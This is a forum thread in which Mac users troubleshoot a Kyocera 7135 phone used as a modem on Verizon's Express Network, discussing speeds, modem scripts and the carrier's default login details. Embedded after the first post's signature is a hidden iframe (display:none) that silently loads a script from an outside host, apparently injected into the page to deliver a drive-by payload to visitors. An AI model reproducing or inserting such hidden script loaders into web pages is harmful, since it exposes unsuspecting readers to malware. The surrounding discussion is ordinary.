+ Reply to Thread

7135 Modem Speed on Express Net with OSX

Hi,

My 7135 is wonderful except for the fact that they barely support the mac. I've dloaded all of the OSX drivers and have gotten the modem to work but I haven't been able to achiece high speeds on express network.

Is this due to a problem with this unofficial driver or some sort of compression software that is not supported on the mac?

Has anyone achieved speeds over 24000 on a mac?

On my PC I've had no probs exceeding ISDN every time every place. It's ridiculous that I can't do this on my mac.

Thanks,

jon<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

LVC

Sppeds Over 24K

I get 44-50K average on my Mac using express network. Do not go by speed on Internet Connect display. Best way to test your speed is by running speed test at bandwidthplace.com/speedtest/ using Kyocera as modem. You will not get 144K (nobody does not even on PC) using Express Network. In addition, the express network compression software (that boosts signal) is written for PC not Mac. Mac version on way---so they say---

How did you get it working as a modem with OSX?

I've tried applying whatever updates I could find and also used the 1.2 modem script from Kyocera. The phone shows up in my Network options but when I dial it fails on authentication. Im using qnc / qnc as user / pass combo and OS 10.1.5. I am launching the Data/Fax app and the phone is responding it just fails on authentication. Any idea what I'm doing wrong or what you're doing different?

My thinking it's either...
    A: Modem Script
    B: The User / Pass i'm using on OSX
    C: A payback plot by the dog for putting her food in a clear container in open view.
    - Dan

7135 Modem Speed on Express Net with OSX

Hmm, LVC, that is very interesting, I used the speed reports on DSL reports and my findings have been very disappointing. Then again it may have much to do with where I am and what time it is, as opposed to the modem driver, it's just that there really is no way to know, right?

Dan, I am attaching all of the modem scripts I have used. All have connected me with no problems so I am imagining that this really comes down to the dog issue. I think there are numerous postings on this site with the correct login procedure, this still didn't stop me from confusing the # and * in my login.

Please let me know if any of you see updated drivers for our macs.

Thanks
    Attached Files

The password to log in is vzw.

User name = phonenumber@vzw3g.com